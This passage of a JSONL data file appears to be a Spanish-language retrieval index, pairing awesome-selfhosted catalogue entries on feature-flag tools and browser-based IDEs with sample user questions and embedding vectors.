-0.06866, 0.04982, -0.06133, -0.03898, -0.0186, 0.09495, -0.00525, -0.04889, 0.03877, -0.07362, -0.04876, 0.01872, 0.107, -0.07134, -0.00073, 0.01909, -0.04931, 0.01604, -0.00626, 0.03996, -0.01567, -0.05816, -0.03872, 0.04438, 0.01414, 0.06084, -0.04763, 0.00942, 0.03136, 0.04951, 0.00159, -0.07787, 0.02309, 0.04334, -0.0129, 0.03138, -0.03005, 0.07368, 0.00117, 0.00173, -0.02957, 0.01103, -0.01514, 0.00924, -0.04066, -0.0399, -0.08194, 0.02363, 0.06328, -0.00724, -0.04592, -0.00024, -0.04264, -0.07181, 0.03564, 0.00654, -0.09121, -0.04835, 0.03577, 0.04475, -0.05195, -0.00152, -0.03592]} +{"tipo": "pregunta", "herramienta": "Software Development - Feature Toggle", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Feature Toggle", "tema": "software development - feature toggle", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Feature Toggle: Featbit β€” Enterprise-grade feature flag platform that you can self-host [MIT, Docker/K8S]. Flagsmith β€” Dashboard, API and SDKs for adding Feature Flags to your applications (alternative to LaunchDarkly) [BSD-3-Clause, Docker/K8S]. Flipt β€” Feature flag solution with support for multiple data backends (alternative to LaunchDarkly) [GPL-3.0, Docker/K8S/Go]. GO Feature Flag β€” Simple, complete, and lightweight feature flag solution (alternative to LaunchDarkly) [MIT, Go].", "indexar": "necesito un sistema de banderas para caracterΓ­sticas ligero y fΓ‘cil de desplegar, ΒΏhay alguna opciΓ³n recomendada?", "v": [0.1402, 0.1836, -0.20314, 0.01414, 0.01857, -0.10142, -0.00917, -0.06017, -0.15055, -0.18529, -0.01094, -0.08711, 0.01565, -0.04144, 0.03706, 0.12745, -0.15682, -0.0278, 0.04208, -0.03564, -0.0765, -0.0534, -0.17993, -0.05608, -0.02437, -0.06824, 0.0692, -0.0365, -0.15916, 0.10115, -0.06951, 0.04964, 0.03435, -0.05181, -0.14684, 0.07673, 0.03946, 0.0529, 0.01019, -0.00273, 0.0462, -0.00647, -0.00504, 0.00465, 0.08165, 0.00396, -0.0003, 0.04921, -0.03334, -0.14479, 0.04892, -0.02944, -0.03609, 0.01903, 0.02066, -0.10944, 0.09741, 0.0134, 0.04556, -0.09524, 0.00552, 0.0211, 0.08082, -0.05103, -0.05808, 0.03394, -0.1224, -0.04998, 0.02023, -0.0263, -0.05648, 0.0137, 0.01748, 0.02528, -0.01063, 0.14607, 0.01212, -0.06567, 0.1587, 0.07245, 0.14128, 0.03919, -0.07301, 0.04954, -0.09911, -0.13047, 0.0546, 0.04195, 0.10167, -0.04749, 0.06039, 0.02025, 0.01425, 0.07324, -0.02908, 0.00236, -0.07454, 0.18139, -0.01476, 0.0856, 0.0587, -0.05149, 0.04635, 0.11954, -0.01478, -0.09938, -0.0391, -0.0306, 0.02108, -0.05886, -0.03212, -0.00468, 0.02773, 0.00201, -0.01057, -0.07286, -0.03631, -0.02924, -0.03951, 0.02161, -0.10888, 0.03475, 0.03138, -0.07633, 0.0709, 0.00132, -0.00502, 0.02698, 0.01937, 0.08196, -0.04437, -0.06235, -0.08751, -0.07714, 0.02429, 0.06344, -0.00864, 0.01679, -0.04921, -0.03035, 0.06254, 0.03906, -0.05273, -0.06749, 0.0288, 0.01345, 0.06421, -0.02325, 0.02072, 0.05314, 0.00492, 0.02648, 0.10556, 0.00471, 0.03135, 0.01649, 0.07724, -0.08187, -0.01686, 0.03356, 0.06406, 0.02784, 0.00754, 0.00973, 0.01476, 0.00182, -0.08848, -0.02468, -0.02843, 0.00874, -0.00802, 0.04601, -0.02137, -0.04368, 0.05448, -0.09656, -0.07064, -0.0016, -0.01664, 0.0215, -0.00542, 0.07789, -0.02741, 0.02713, 0.04048, -0.04393, -0.04819, -0.00168, 0.06955, 0.01063, 0.02956, 0.02562, -0.04944, 0.01431, -0.01768, 0.03862, 0.00066, -0.06587, -0.02413, 0.00315, -0.0981, 0.00828, -0.11155, -0.06082, 0.02759, 0.00874, -0.04398, 0.05901, 0.03831, 0.06455, 0.04356, 0.00991, 0.03339, 0.00045, -0.04607, 0.05583, -0.02249, -0.01129, 0.02994, -0.014, -0.0073, 0.06201, 0.04147, 0.09568, -0.02015, -0.02129, 0.05051, -0.00115, 0.0155, 0.04553, 0.03615, 0.00983, 0.01046, -0.01965, 0.02399, -0.01483, 0.02694, -0.0488, -0.06795, -0.03614, 0.07407, 0.0922, -0.0079, 0.00331, 0.02229, -0.06627, -0.04039, 0.02739, -0.06631, -0.12301, 0.00139, -0.01147, 0.02171, -0.03091, -0.00871, -0.01143]} +{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: Atheos β€” Web-based IDE framework with a small footprint and minimal requirements, continued from Codiad [MIT, PHP/Docker]. code-server β€” VS Code in the browser, hosted on a remote server [MIT, Nodejs/Docker]. Coder β€” Remote development machines on your own infrastructure [AGPL-3.0, Go/Docker/K8S/deb]. Eclipse Che β€” Open source workspace server and cloud IDE [EPL-1.0, Docker/Java]. Hopp β€” Remote pair programming app with low-latency 4K screen sharing, drawing, and remote control, with clients for macOS and Windows (alternative to Tuple, Pop, Drovio, Coscreen) [AGPL-3.0, Docker]. Judge0 CE β€” API to compile and run source code [GPL-3.0, Docker]. JupyterLab β€” Web-based environment for interactive and reproducible computing [BSD-3-Clause, Python/Docker]. Langfuse β€” LLM engineering platform for model tracing, prompt management, and application evaluation. Langfuse helps teams collaboratively debug, analyze, and iterate on their LLM applications such as chatbots or AI agents [MIT, Docker].", "indexar": "que programa me permite editar cΓ³digo directamente desde el navegador?", "v": [-0.00133, -0.00357, -0.09232, -0.17509, -0.04259, -0.16789, 0.08209, 0.02467, -0.11092, -0.18516, -0.01999, -0.1141, -0.01192, -0.19428, 0.02848, 0.00286, 0.15765, -0.07513, 0.1192, 0.02519, 0.02584, -0.02711, -0.00169, -0.06721, 0.02833, -0.01548, -0.01646, 0.03065, -0.03407, -0.09828, -0.05571, -0.06819, 0.088, -0.02788, -0.06231, 0.0941, 0.20306, 0.06306, -0.00707, 0.03338, -0.00828, -0.01943, -0.02463, 0.05868, 0.02069, -0.00857, 0.08942, 0.02138, 0.01472, -0.08602, -0.01539, 0.00328, -0.10978, 0.04192, -0.01054, -0.01488, 0.05298, -0.12185, -0.07488, -0.01501, 0.1414, -0.0522, 0.02522, -0.03062, -0.03164, -0.00876, 0.15494, -0.005, -0.06884, 0.07463, 0.02931, 0.03274, -0.01174, 0.02653, 0.01444, 0.02881, -0.04494, -0.03798, 0.0904, 0.03025, 0.03401, 0.01349, -0.01107, 0.0214, -0.00049, -0.03065, -0.0072, -0.03722, -0.01339, -0.07251, 0.10837, 0.06108, 0.02591, 0.04579, 0.02317, -0.07905, 0.101, 0.04739, 0.08761, 0.02983, 0.05218, -0.09804, -0.0052, 0.10547, 0.11795, 0.06234, 0.12237, -0.0397, -0.05623, 0.12099, -0.01532, -0.05312, -0.07593, -0.08038, -0.05142, 0.05943, 0.00649, 3e-05, -0.02587, -0.16157, -0.1726, 0.04961, -0.16729, 0.05192, 0.0586, 0.07214, 0.00062, 0.08785, -0.06586, -0.0192, -0.0496, -0.04946, 0.00604, 0.03357, -0.03593, -0.00307, -0.00486, -0.00133, 0.07565, 0.02713, 0.01886, -0.00208, 0.0426, 0.1353, 0.02474, -0.01698, -0.0628, -0.07774, -0.05135, -0.04201, 0.02267, 0.02267, -0.0548, 0.00767, -0.06824, 0.06416, -0.04762, 0.01585, -0.06093, 0.0287, -0.08745, -0.00334, -0.01954, -0.07085, 0.0333, -0.05777, -0.02538, 0.01226, 0.08868, 0.07598, 0.00607, 0.06895, 0.12921, -0.05797, 0.0223, 0.03957, 0.02502, -0.00281, -0.0164, -0.01383, -0.03567, 0.05313, 0.0905, -0.04287, -0.064, -0.05742, -0.01854, 0.08567, -0.04015, -0.01924, -0.01363, 0.0643, 0.01888, 0.01802, 0.02461, 0.0329, -0.03418, 0.00899, -0.00525, -0.07771, -0.04744, 0.01443, 0.05249, -0.04723, 0.01206, 0.08221, 0.02989, -0.04971, 0.03723, 0.07536, -0.0405, -0.05075, 0.07038, 0.03032, 0.01856, 0.01205, 0.01137, 0.04622, 0.07219, -0.026, -0.0187, -0.08172, 0.03323, 0.0166, 0.0378, -0.09041, 0.02425, 0.05279, -0.03577, 0.00516, 0.02382, -0.07204, -0.04148, -0.02198, 0.06748, -0.00658, -0.02501, 0.00351, -0.03648, -0.05834, -0.03387, 0.06534, 0.01698, -0.0513, -0.0199, 0.01771, -0.04096, -0.0532, -0.0081, 0.02153, -0.05747, 0.00626, 0.02652, -0.08837, -0.0171, 0.03598]} +{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: Atheos β€” Web-based IDE framework with a small footprint and minimal requirements, continued from Codiad [MIT, PHP/Docker]. code-server β€” VS Code in the browser, hosted on a remote server [MIT, Nodejs/Docker]. Coder β€” Remote development machines on your own infrastructure [AGPL-3.0, Go/Docker/K8S/deb]. Eclipse Che β€” Open source workspace server and cloud IDE [EPL-1.0, Docker/Java]. Hopp β€” Remote pair programming app with low-latency 4K screen sharing, drawing, and remote control, with clients for macOS and Windows (alternative to Tuple, Pop, Drovio, Coscreen) [AGPL-3.0, Docker]. Judge0 CE β€” API to compile and run source code [GPL-3.0, Docker]. JupyterLab β€” Web-based environment for interactive and reproducible computing [BSD-3-Clause, Python/Docker]. Langfuse β€” LLM engineering platform for model tracing, prompt management, and application evaluation. Langfuse helps teams collaboratively debug, analyze, and iterate on their LLM applications such as chatbots or AI agents [MIT, Docker].", "indexar": "quΓ© herramienta sirve para programar a distancia compartiendo pantalla en tiempo real?", "v": [0.07603, 0.12293, -0.16285, -0.18992, 0.0114, -0.16494, -0.01835, -0.07169, 0.02401, -0.07365, 0.00677, -0.06477, 0.01199, -0.10239, 0.06679, 0.06043, 0.08354, -0.05244, 0.03419, -0.00619, 0.00826, 0.03459, -0.16866, -0.06605, -0.05879, -0.05917, 0.08867, 0.01101, -0.18811, 0.00839, 0.02021, 0.04237, 0.09972, -0.1532, -0.07644, -0.09746, 0.0536, 0.10817, -0.03985, 0.01094, 0.05215, 0.14872, -0.00209, 0.02543, 0.05105, 0.02192, 0.05127, 0.01045, -0.01783, 0.03116, -0.16398, -0.03837, -0.03195, 0.05972, 0.01851, -0.11723, 0.1956, -0.1372, 0.07043, -0.08764, -0.06725, -0.03219, -0.04495, -0.03715, -0.00559, -0.03735, 0.03811, -0.00686, -0.12198, 0.0468, -0.11883, 0.00255, -0.01801, -0.02922, -0.0172, 0.00477, -0.01815, -0.01695, 0.07445, -0.04915, 0.03753, -0.03477, -0.0105, 0.00995, -0.06697, -0.07094, 0.10702, -0.02996, -0.04259, -0.07488, -0.02181, 0.128, 0.00098, -0.00476, 0.07279, 0.01036, 0.11641, -0.01297, 0.01325, 0.05842, 0.14949, -0.14194, -0.08297, 0.00651, -0.06621, 0.10115, -0.00224, -0.07568, -0.05591, -0.0317, 0.06947, -0.02377, -0.08621, -0.03877, -0.06153, 0.0238, 0.02968, -0.08299, -0.00515, -0.05154, -0.01781, 0.09676, -0.07214, -0.03342, 0.05615, 0.02989, -0.0455, 0.06061, -0.07998, -0.05123, -0.02982, -0.0826, -0.05402, -0.00724, -0.06714, -0.0237, 0.02201, -0.06897, 0.00274, -0.11935, 0.02123, 0.06995, -0.06063, -0.09154, -0.00451, 0.03757, 0.02314, -0.00372, -0.07476, 0.04741, 0.03785, -0.02198, 0.03796, 0.07254, -0.07239, -0.02383, -0.04241, 0.03145, -0.13541, 0.01422, -0.0339, -0.03841, -0.04071, -0.06842, 0.03249, -0.0959, 0.00025, 0.04098, 0.09834, 0.08351, 0.02922, 0.09689, 0.08636, -0.04798, -0.02713, -0.03522, -0.02343, -0.00156, -0.05723, -0.09829, -0.03547, 0.04071, 0.00096, 0.00764, 0.02316, 0.0212, -0.00966, 0.02202, -0.00769, -0.00124, 0.02548, 0.013, 0.02287, 0.00077, 0.01492, -0.03018, -0.02693, -0.04802, 0.07202, -0.01201, -0.04703, -0.04771, 0.04362, 0.00572, 0.06979, 0.08957, -0.02673, 0.07093, -0.00376, 0.07686, 0.02017, -0.01383, 9e-05, 0.02637, -0.0157, -0.0266, 0.05739, 0.00099, 0.0044, -0.0024, 0.03006, -0.02148, 0.00115, -0.0286, -0.03767, 0.01719, 0.03765, 0.05897, -0.03177, -0.03505, 0.00569, -0.01303, 0.02676, 0.00208, -0.01133, -0.04754, 0.03238, -0.05833, -0.01925, -0.05102, -0.04282, 0.03966, -0.00723, -0.01231, -0.04819, -0.0447, -0.06879, -0.03111, -0.02808, -0.09044, -0.08672, 0.0028, 0.0661, 0.00895, -0.00451, 0.02078]} +{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: Atheos β€” Web-based IDE framework with a small footprint and minimal requirements, continued from Codiad [MIT, PHP/Docker]. code-server β€” VS Code in the browser, hosted on a remote server [MIT, Nodejs/Docker]. Coder β€” Remote development machines on your own infrastructure [AGPL-3.0, Go/Docker/K8S/deb]. Eclipse Che β€” Open source workspace server and cloud IDE [EPL-1.0, Docker/Java]. Hopp β€” Remote pair programming app with low-latency 4K screen sharing, drawing, and remote control, with clients for macOS and Windows (alternative to Tuple, Pop, Drovio, Coscreen) [AGPL-3.0, Docker]. Judge0 CE β€” API to compile and run source code [GPL-3.0, Docker]. JupyterLab β€” Web-based environment for interactive and reproducible computing [BSD-3-Clause, Python/Docker]. Langfuse β€” LLM engineering platform for model tracing, prompt management, and application evaluation. Langfuse helps teams collaboratively debug, analyze, and iterate on their LLM applications such as chatbots or AI agents [MIT, Docker].", "indexar": "cuΓ‘l puedo usar para ejecutar y compilar mi cΓ³digo sin instalar nada en mi ordenador?", "v": [0.02498, 0.10572, -0.15289, -0.06341, 0.06432, -0.22762, -0.04377, 0.05684, -0.18847, -0.11908, -0.14477, -0.11007, 0.00517, -0.06986, 0.02645, -0.14297, 0.09711, -0.09822, 0.05827, -0.01734, 0.01628, -0.05766, -0.03257, -0.02858, -0.02764, 0.1327, 0.00537, 0.03225, -0.13113, -0.17977, -0.00037, 0.0263, 0.11581, -0.08414, -0.08992, 0.00854, 0.04883, -0.00439, -0.05063, 0.04513, 0.00482, 0.09873, -0.04056, 0.11618, 0.08397, -0.03182, 0.11333, -0.06056, 0.01564, -0.02209, -0.02133, 0.00888, -0.08967, -0.04346, 0.00919, -0.12969, 0.0973, -0.11098, 0.08025, -0.01116, -0.00254, 0.03501, -0.00849, 0.07181, 0.05866, -0.00847, -0.02145, 0.01268, -0.10247, 0.10122, -0.07296, 0.08668, -0.06422, -0.05546, 0.0483, 0.04412, -0.02631, -0.14488, 0.15912, 0.09473, 0.03785, -0.0825, -0.0467, -0.09342, -0.01186, -0.06514, 0.02469, -0.07784, 0.05249, -0.07782, 0.05927, -0.02279, -0.0727, 0.01927, 0.07491, -0.04494, 0.08717, 0.10637, -0.02139, 0.02708, 0.08833, -0.07408, -0.00067, 0.14394, 0.01779, 0.03344, 0.03525, -0.0303, 0.04436, -0.08791, 0.03683, -0.033, -0.0954, -0.06282, -0.09157, -0.02534, 0.03356, -0.04166, -0.08839, -0.00541, -0.05517, 0.03065, -0.06327, 0.0222, 0.00909, 0.01825, 0.02687, 0.08374, -0.0539, -0.01192, -0.0642, -0.08532, 0.02421, -0.04917, -0.04031, 0.03418, -0.00908, -0.06879, 0.01906, -0.03219, 0.03528, 0.0841, -0.04723, 0.07593, 0.00479, 0.10548, -0.00498, -0.00599, -0.04996, -0.08296, 0.09271, 0.03425, -0.03098, 0.04139, -0.04547, 0.00647, 0.11563, 0.04111, 0.02166, -0.02997, -0.02191, 0.04136, -0.01224, -0.0391, 0.00551, -0.01548, -0.04331, -0.04493, 0.03876, 0.04563, 0.01548, 0.07174, 0.0187, -0.0826, 0.08078, -0.06561, -0.0017, 0.01741, -0.03373, 0.00493, -0.00532, 0.09854, 0.04617, 0.02683, -0.02707, 0.01899, 0.00033, 0.02408, -0.06258, -0.00752, 0.01119, 0.03416, 0.03165, -0.04148, 0.04066, 0.00518, -0.01368, -0.0309, -0.02521, -0.06149, -0.07101, 0.02147, -0.0725, -0.05057, 0.12157, 0.05556, -0.07267, 0.00922, -0.02272, 0.06744, 0.01098, -0.00093, 0.01597, -0.00683, -0.04161, -0.03573, 0.04808, 0.04095, 0.04571, -0.03256, 0.01127, 0.00404, 0.02581, 0.00378, 0.00474, -0.03417, -0.00796, -0.0009, -0.01906, 0.01002, -0.031, 0.02288, -0.00226, -0.00176, -0.00694, -0.00802, -0.01401, -0.01252, -0.04686, -0.02349, 0.0289, 0.07522, 0.02638, -0.07921, -0.06762, 0.01361, -0.06446, -0.0289, -0.07914, -0.0635, -0.02768, -0.02463, 0.03943, -0.06179, -0.02283, 0.06074]} +{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: LiveCodes β€” Feature-rich client-side code playground for React, Vue, Svelte, Solid, Typescript, Python, Go, Ruby, PHP and 90+ other languages [⚠, MIT, Nodejs]. Lowdefy β€” Build internal tools, BI dashboards, admin panels, CRUD apps and workflows in minutes using YAML / JSON on an self-hosted, open-source platform. Connect to your data sources, host via Serverless, Netlify or Docker [Apache-2.0, Nodejs/Docker]. RapidForge β€” Lightweight platform for building webhooks, scheduled tasks and pages. Implement your logic with Bash or Lua [Apache-2.0, Go/Nodejs]. RStudio Server β€” Web browser based IDE for R [AGPL-3.0, Java/C++].", "indexar": "que herramienta me sirve para probar cΓ³digo en el navegador?", "v": [-0.01319, -0.01959, -0.21247, -0.21663, -0.0773, -0.20809, 0.01033, 0.04572, -0.01323, -0.18815, -0.05579, -0.09424, 0.04509, -0.14725, -0.01154, 0.02387, 0.16464, -0.13614, 0.03087, 0.03036, 0.03934, -0.01964, -0.11311, -0.06548, -0.02668, -0.02679, -0.01406, 0.00611, -0.13403, -0.03554, -0.07768, -0.04473, 0.11761, -0.02525, -0.16034, 0.04665, 0.12, 0.00713, -0.0144, 0.04927, 0.01431, 0.00283, -0.04591, 0.07996, -0.03835, 0.05151, -0.01143, 0.01983, -0.06133, 0.03278, -0.04545, -0.12904, -0.12292, 0.04548, -0.03766, -0.0591, 0.13935, -0.12159, -0.01187, -0.08568, 0.0185, -0.09832, -0.00814, -0.03592, -0.01971, -0.05977, 0.04899, 0.00975, -0.09288, 0.04719, -0.00553, 0.08685, -0.03658, -0.04239, -0.01008, 0.03465, 0.0359, 0.00336, 0.09882, 0.04192, 0.08723, 0.02851, -0.12807, -0.03458, -0.01431, -0.10934, 0.03544, -0.03915, 0.06271, -0.09791, 0.10703, 0.10856, -0.00516, 0.0348, 0.0238, -0.02873, 0.12057, -0.0188, 0.08179, -0.03675, 0.1489, -0.10605, -0.03941, 0.05773, 0.06811, 0.03309, 0.04121, -0.04263, -0.02874, 0.02641, 0.00625, -0.0605, -0.12833, 0.0065, -0.02406, 0.05731, -0.03984, -0.05477, -0.08115, -0.11957, -0.03027, 0.05378, -0.18554, 0.02449, 0.00111, 0.08166, -0.01394, 0.05487, 0.01048, -0.09008, -0.02231, -0.05381, -0.05581, 0.09557, -0.00054, 0.02457, 0.06255, -0.0695, 0.01838, 0.01769, 0.03339, 0.01803, -0.01083, 0.02226, 0.02133, 0.04253, -0.00395, -0.00945, -0.06449, -0.03875, -0.00162, -0.06121, -0.0407, 0.01146, -0.10378, 0.00758, -0.03559, 0.01866, -0.0671, 0.03839, -0.10032, -0.02183, 0.04223, 0.03416, 0.00976, -0.0468, -0.00261, -0.02494, 0.10341, 0.0402, 0.0682, 0.01253, 0.12173, -0.07167, 0.02926, -0.02119, -0.0371, 0.02368, -0.05906, -0.0509, 0.02392, 0.02495, 0.0136, -0.03729, -0.02024, -0.0555, 0.02213, 0.01153, -0.02695, 0.01223, 0.00031, 0.04966, 0.00506, -0.02183, 0.05082, 0.04146, 0.01124, -0.04722, -0.00353, -0.06576, -0.01614, -1e-05, -0.01698, -0.0704, 0.01684, 0.06722, 0.00482, -0.04816, 0.01574, 0.0275, 0.02231, -0.01329, 0.06975, -0.00122, -0.00645, -0.02128, 0.02818, 0.06305, 0.00552, -0.02269, -0.00035, -0.0464, -0.00284, 0.00785, 0.01676, 0.02475, 0.01841, 0.0062, -0.03823, -0.02482, 0.04441, -0.04059, -0.03508, 0.00798, 0.04005, -0.03856, 0.014, -0.00264, -0.08031, -0.06293, -0.04409, 0.03446, 0.00222, -0.04342, -0.02329, -0.03339, -0.00863, -0.07694, -0.02994, -0.02241, -0.05068, -0.02079, 0.05078, -0.04368, -0.0088, 0.03085]} +{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: LiveCodes β€” Feature-rich client-side code playground for React, Vue, Svelte, Solid, Typescript, Python, Go, Ruby, PHP and 90+ other languages [⚠, MIT, Nodejs]. Lowdefy β€” Build internal tools, BI dashboards, admin panels, CRUD apps and workflows in minutes using YAML / JSON on an self-hosted, open-source platform. Connect to your data sources, host via Serverless, Netlify or Docker [Apache-2.0, Nodejs/Docker]. RapidForge β€” Lightweight platform for building webhooks, scheduled tasks and pages. Implement your logic with Bash or Lua [Apache-2.0, Go/Nodejs]. RStudio Server β€” Web browser based IDE for R [AGPL-3.0, Java/C++].", "indexar": "con que puedo crear dashboards internos usando YAML?", "v": [0.09163, 0.09959, -0.21217, -0.04614, -0.01514, -0.0163, -0.05321, 0.05359, -0.09301, -0.04915, -0.12185, -0.05072, -0.00743, -0.1269, -0.16457, 0.12641, 0.08116, -0.07385, -0.12052, -0.06473, 0.03621, -0.02486, -0.13948, -0.00754, -0.04525, -0.05559, -0.02411, -0.04835, -0.20909, 0.00169, 0.00474, -0.01885, -0.02806, 0.02946, -0.05058, -0.11943, -0.05315, 0.14896, -0.09836, 0.03265, 0.02611, 0.13904, -0.1012, 0.05552, 0.14913, 0.00084, 0.01277, -0.00887, -0.12409, 0.06439, -0.0816, 0.01772, -0.1622, 0.07746, 0.054, -0.14414, 0.07583, -0.08083, 0.11283, -0.05423, -0.13006, 0.12135, 0.0806, 0.05869, -0.108, -0.05285, 0.01984, 0.0239, -0.0257, 0.09417, -0.00227, -0.02712, 0.02006, -0.08037, 0.13492, 0.08002, -0.05106, -0.01589, 0.04046, 0.03449, -0.03104, -0.09493, -0.04708, 0.04938, -0.04951, -0.07896, 0.00544, -0.03, 0.01021, -0.02848, 0.06998, -0.03269, -0.0603, -0.00627, -0.10438, 0.07449, 0.08035, -0.03438, -0.02264, -0.03688, -0.06059, -0.02809, -0.02865, 0.11369, 0.03966, 0.0808, 0.04146, -0.12407, 0.04584, -0.05361, 0.04913, 0.01265, -0.05367, -0.05584, 0.00366, 0.02463, 0.01921, -0.00466, 0.00266, -0.05103, 0.01516, -0.03655, -0.07425, -0.03803, -0.07355, -0.04834, -0.00571, 0.06972, -0.01154, 0.08821, -0.024, -0.0042, -0.10661, 0.0391, -0.03834, 0.05272, -0.05372, -0.01148, -0.04221, -0.01466, 0.03123, 0.0317, 0.06867, -0.07763, 0.04684, -0.01975, -0.01222, -0.06867, -0.05643, 0.08914, -0.01464, 0.05491, -0.02916, 0.01319, -0.07993, -0.01643, -0.00301, -0.04823, -0.04603, 0.05808, 0.004, 0.03316, 0.01522, 0.13423, 0.01239, -0.07519, -0.05809, 0.01882, 0.066, 0.06558, 0.02321, 0.09833, 0.0377, -0.06015, 0.0142, -0.02076, -0.03761, -0.02762, 0.05779, -0.03249, -0.03147, -0.00239, -0.05575, -0.04247, -0.05158, -0.05906, -0.03335, -0.01327, 0.04274, 0.01375, -0.07905, 0.09423, 0.03374, -0.02252, 0.04758, -0.02633, 0.01534, -0.04587, 0.00361, -0.06034, -0.0093, 0.03778, -0.02024, -0.08567, 0.04449, 0.02285, -0.05551, 0.07763, -0.01492, 0.01546, 0.07318, 0.00166, 0.0601, -0.02812, -0.02207, 0.0102, 0.07981, -0.07212, 0.0177, -0.03699, 0.03994, 0.03497, 0.03672, -0.01282, -0.00509, 0.07288, 0.01674, 0.0256, -0.03631, 0.03912, 0.00016, 0.01167, -0.02833, -0.03267, 0.03263, 0.03832, -0.00521, -0.04077, 0.01894, -0.04396, -0.00882, 0.03671, -0.00161, 0.00432, -0.01499, -0.08832, -0.02749, 0.03792, -0.00802, -0.0668, -0.00151, 0.02692, 0.03779, -0.03859, -0.00455, -0.01573]} +{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: LiveCodes β€” Feature-rich client-side code playground for React, Vue, Svelte, Solid, Typescript, Python, Go, Ruby, PHP and 90+ other languages [⚠, MIT, Nodejs]. Lowdefy β€” Build internal tools, BI dashboards, admin panels, CRUD apps and workflows in minutes using YAML / JSON on an self-hosted, open-source platform. Connect to your data sources, host via Serverless, Netlify or Docker [Apache-2.0, Nodejs/Docker]. RapidForge β€” Lightweight platform for building webhooks, scheduled tasks and pages. Implement your logic with Bash or Lua [Apache-2.0, Go/Nodejs]. RStudio Server β€” Web browser based IDE for R [AGPL-3.0, Java/C++].", "indexar": "cual es un ambiente de desarrollo para Python que funcione desde el navegador?", "v": [-0.1169, -0.02752, -0.14757, -0.23925, -0.01499, -0.14284, 0.00085, -0.04529, -0.11044, -0.07301, 0.02591, 0.01092, -0.11797, -0.02929, -0.08289, -0.05052, 0.00961, -0.11366, 0.02945, -0.01316, -0.20115, 0.0072, -0.04605, -0.03041, 0.08056, 0.08026, -0.00727, -0.0404, -0.08903, 0.00164, 0.11631, 0.09076, 0.13528, 0.05071, -0.09856, -0.12633, 0.09902, 0.03325, -0.00556, -0.06026, -0.08872, -0.11969, -0.0533, 0.1073, -0.16704, 0.04543, 0.0569, -0.07781, -0.01279, -0.03953, -0.10006, -0.04397, -0.06506, -0.00198, 0.08186, 0.01951, 0.05766, -0.1043, 0.16486, -0.03428, -0.0603, -0.01482, 0.02515, -0.04412, -0.02081, -0.12088, 0.00046, -0.02744, -0.05401, 0.06272, -0.07625, 0.04871, -0.0529, 0.04577, 0.10745, 0.07793, -0.14266, 0.04739, -0.05495, 0.09955, 0.01527, -0.02559, -0.07769, 0.01712, -0.05112, -0.12413, 0.04183, -0.06893, 0.06804, -0.00771, 0.01518, 0.07643, 0.01298, 0.0094, -0.03508, -0.03717, 0.07289, -0.01287, 0.05311, 0.02209, -0.02675, -0.04831, -0.04239, 0.08369, 0.03023, 0.02283, 0.05458, -0.04228, -0.04247, -0.00432, 0.0574, 0.00232, -0.01532, -0.05297, -0.0858, -0.0786, -0.09465, -0.0256, -0.07191, -0.04676, -0.13161, 0.04375, -0.13272, 0.07929, -0.05717, 0.06285, 0.03657, 0.05012, 0.05441, 0.02336, 0.00291, -0.047, -0.01098, 0.02565, -0.06679, 0.15281, 0.05853, -0.00553, 0.02371, 0.03631, 0.0139, 0.02632, 0.01991, 0.11684, 0.06416, 0.01275, -0.01298, -0.03922, -0.11268, -0.04771, 0.05444, -0.03854, 0.023, 0.00335, -0.12101, 0.02376, -0.08801, -0.00304, 0.04038, -0.05099, 0.00962, -0.04571, 0.07524, -0.00186, 0.06554, -0.05583, -0.03776, 0.01016, 0.04097, 0.00723, -0.00173, -0.04908, 0.02065, -0.12992, 0.00908, -0.07822, -0.02108, -0.0078, 0.03354, 0.00332, -0.03277, 0.01604, -0.03549, -0.0172, -0.04074, -0.02227, 0.02783, -0.02746, -0.07604, 0.0313, 0.00739, 0.047, -0.06654, -0.03368, 0.02902, -0.02195, -0.01782, -0.07127, -0.01805, -0.044, 0.00131, -0.01391, -0.00841, -0.01432, 0.03623, 0.0719, -0.01439, -0.03857, -0.01941, -0.02964, 0.07129, 0.00438, 0.04885, 0.04527, 0.0107, 0.01484, 0.04034, 0.00845, 0.05104, -0.00275, -0.04924, -0.01969, 0.08138, 0.01774, 0.02624, -0.02653, 0.04667, 0.01991, 0.03068, -0.01015, -0.05485, -0.01676, -0.02844, -0.04922, -0.00149, 0.04631, 0.02888, -0.00505, -0.09494, -0.04249, -0.0252, 0.06616, -0.02282, -0.07481, -0.0429, -0.01957, -0.08212, 0.02064, 0.0084, -0.0773, -0.04413, -0.00287, -0.00546, -0.03891, -0.02274, 0.02912]} +{"tipo": "pregunta", "herramienta": "Software 